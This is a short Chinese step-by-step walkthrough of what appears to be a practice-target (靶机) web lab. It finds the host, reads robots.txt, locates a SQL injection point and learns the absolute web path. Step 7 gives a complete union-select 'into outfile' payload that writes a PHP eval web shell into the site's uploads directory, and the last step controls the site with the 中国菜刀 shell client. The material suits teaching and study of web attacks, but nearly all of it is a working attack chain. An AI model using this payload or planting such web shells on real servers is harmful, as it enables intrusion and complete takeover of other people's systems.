一.打开御剑2014寻找靶机,通过一个个的尝试得到靶机IP
二.利用爬虫robots.txt查看靶机目录
三.访问目录发现无法访问,但可以访问文件的上一级得到一个可以进行sql注入的点
四.利用kali虚拟机的dirsearch对目录进行扫描,得到一个PHP文件
五.对该文件进行访问,可以得到该网站的绝对路径,以此就可以把木马写进去
六.判断闭合方式为’,字段数为3
七.输入命令1'union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/sis.php'#把木马文件写入网站目录
八.查看木马文件是否成功写入网站
九.利用工具中国菜刀就可以对该网站进行操作